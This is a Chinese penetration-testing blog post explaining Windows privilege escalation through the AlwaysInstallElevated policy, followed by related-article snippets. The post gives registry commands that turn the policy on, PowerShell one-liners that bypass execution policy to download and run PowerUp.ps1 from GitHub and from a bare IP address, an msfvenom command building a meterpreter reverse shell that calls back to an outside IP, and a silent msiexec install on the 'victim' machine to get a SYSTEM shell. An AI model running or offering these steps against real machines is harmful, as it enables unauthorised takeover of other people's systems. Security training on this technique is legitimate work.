Windows操作系统提权之系统服务漏洞提权Always Install Elevated

最新推荐文章于 2025-03-01 20:40:46 发布
最新推荐文章于 2025-03-01 20:40:46 发布
阅读量823 收藏 30
点赞数 16
分类专栏: 内网渗透 文章标签: 内网 渗透测试 安全 网络 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80361487/article/details/139379246
版权
Always Install Elevated

1.形成原因

任意用户以NT AUTHORITY\SYSTEM权限安装 i。
AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非
特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以
system权限执行任意payload。
MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序

2.Always Install Elevated(判断是否激活Always Install Elevated)

在测试环境启用AlwaysInstallElevated,命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

通过powerup判断

powershell -ep bypass iex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

 

powershell -ep bypass iex(new-object
net.webclient).downloadstring('http://150.158.137.72:8000/PowerUp.ps1');Get-
RegistryAlwaysInstallElevated

通过注册表判断

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启

通过修改注册表激活:

reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

3.提权准备 

2 msf生成exe程序
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=9090 LHOST=119.45.175.218 -f exe
>1.exe
3. 使用exemsi将exe封装为msi。
配置样式为下图所示,其他默认即可

4.提权流程 

上传test.msi到目标机器上

运行msi程序,得到system权限的shell。
受害者机器上执行:msiexec /quiet /qn /i 1.msi
系统安全Windows内核漏洞(CVE-2024-30088)
李火火的安全圈
08-21 885
CVE-2024-30088是Windows内核漏洞,由越南安全研究员@Bùi Quang Hiếu详细分析。漏洞发生在AuthzBasepCopyoutInternalSecurityAttributes函数中,该函数在复制SecurityAttributesList时会使用用户供的指针,在校验及复制期间存在时间差,导致存在TOCTOU漏洞
windows漏洞
08-02
漏洞
CVE-2020-0787 Windows全版本本地漏洞复现
m0_56642842的博客
07-23 3409
0x00 简介 2020年3月,微软公布了一个影响范围堪称windows全版本的本地漏洞CVE-2020-0787,根据微软的漏洞描述,攻击者在使用低限用户登录系统后,可以利用该漏洞构造恶意程序直接到administrator或者system限。 0x01 漏洞概述 当Windows背景智能传输服务(BITS)没有正确处理符号链接时,存在特漏洞。成功利用此漏洞的攻击者可以改写目标文件,从而限。要利用这个漏洞,攻击者首先必须登录系统,攻击者可以运行EXP,利用该漏洞进而完全控制受
深入探索 Windows :信息收集与内核漏洞实战
m0_57836225的博客
03-01 664
网络安全领域,Windows 系统是一项关键技术,它能帮助安全研究人员和渗透测试人员深入了解系统安全性,同时也是攻击者获取更高限的手段。本文将围绕 Windows 信息收集和内核漏洞展开详细探讨,并附上相关代码示例,助力读者深入理解这一复杂且重要的领域。
利用AlwaysInstallElevated
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言利用过程1.判断是否激活alwaysinstallelevated1.1通过powerup判断1.2通过注册表的键值判断2.激活AlwaysInstallElevated3.4.防御方式5.参考文章 前言 AlwaysInstallElevated是注册表的一个键值,当其值为1的时候,普通用户即可以system限安装msi程序。 利用过程 1.判断是否激活alwaysinstallelevated 1.1通过powerup判断 下载powerup certutil.exe -u
AlwaysInstallElevated介绍
bring_coco的博客
01-28 1525
介绍:AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system限安装MSI文件 一.判断AlwaysInstallElevated状态 1.通过PowerUp判断 可以使用PowerUP的Get-RegistryAlwaysInstallElevated模块来检查注册表项是否被设置,如果AlwaysInstallElevated注册表项被设置,意味着MSI文件是以SYSTEM限运行的,True表示已经设置 命令:PowerShell -nop -exec b
系统权之Windows
f_carey的博客
11-04 3057
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
Windows本地漏洞(CVE-2021-1732)复现
weixin_47531489的博客
07-20 2273
1 简介 2021年2月10日,微软每月的例行补丁包中修复了一个Windows系统本地漏洞,本地攻击者可以利用此漏洞升到system限,据称此漏洞被用于定向攻击活动。 2 漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统限。 漏洞等级:高危,漏洞评分:7.8。 3 影响范围 Windows Server, version 20H2 (Server Core Installation)
CVE-2018-8120 Microsoft Windows漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows漏洞 Exp_32 该资源适用于64位windows操作系统
Windows---系统漏洞
qq_40012781的博客
07-02 1463
思路:使用辅助工具检查出电脑上存在哪些漏洞,然后精准打击...
注册键AlwaysInstallElevated
m0_68636078的博客
10-04 370
自用
AlwaysInstallElevated演示
bring_coco的博客
01-28 366
环境:kali Win7 1.打开win7先进行注册表的修改 命令:reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DW
Windows漏洞CVE-2021-442287
qq_53579360的博客
11-25 1006
Windows漏洞CVE-2021-442287
CVE-2021-1732_Windows本地漏洞
weixin_45715461的博客
06-30 2724
CVE-2021-1732_Windows本地漏洞
Windows系统内核溢出漏洞
qq_61553520的博客
05-29 2152
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,高打开的速度。
升】 Windows10 本地漏洞复现及详细分析(CVE-2021-1732)
李火火的安全圈
12-07 5359
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的升至最高的 。属于windows系统级别的二进制漏洞
木马程序攻击+利用Windows内核漏洞
m0_71745258的博客
01-22 5013
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
windows漏洞流程
最新发布
03-19
### Windows 漏洞利用流程 在讨论如何通过漏洞实现升之前,需强调合法性和道德责任的重要性。未经授渗透测试或攻击行为违反法律并可能导致严重后果。 #### 收集目标信息 在执行任何操作前,必须先收集有关目标系统的详细信息。这一步骤通常涉及扫描开放端口、识别操作系统版本以及检测已安装的安全补丁级别。例如,在某些情况下,未修补的 CVE-2019-0708 可能表明存在远程代码执行风险[^3]。 #### 查找潜在漏洞 一旦获取了足够的背景数据,则可以开始寻找适用于特定环境中的已知漏洞。对于 Windows 平台而言,常见的类别包括但不限于内核模式驱动程序错误处理不当所引发的缓冲区溢出问题[^2] 或者像 CLFS 日志服务这样的组件中存在的设计缺陷[^4]。 #### 开发/选择合适的 exploit 当确认某个具体类型的弱点确实存在于待攻破机器之上之后 ,就需要着手构建或者选取相应的exploit脚本 。这些工具能够自动化地触发发现出来的安全隐患,并最终达成预期效果——即获得更高层次上的控制(如管理员级)。下面给出了一段伪代码用于说明概念: ```python def exploit_vulnerability(target_ip, payload): """ A hypothetical function to demonstrate the process of exploiting a vulnerability. Args: target_ip (str): The IP address of the target machine. payload (bytes): The malicious code or command to execute on success. Returns: bool: True if exploitation was successful, False otherwise. """ try: # Connect to the vulnerable service connection = establish_connection(target_ip) # Send specially crafted data to trigger the vulnerability send_payload(connection, payload) # Check whether elevated privileges have been obtained result = verify_privilege_escalation() return result except Exception as e: log_error(e) return False ``` 请注意上述仅为示意性质的功能框架图,并不构成实际可用的技术手段。 #### 验证成果与清理痕迹 最后阶段要做的工作便是检验整个过程是否达到了既定目的;与此同时也要考虑到后续可能面临的追踪调查情况,因此有必要采取措施消除活动期间留下的各种迹象以防万一。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知归期的迷途羔羊

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值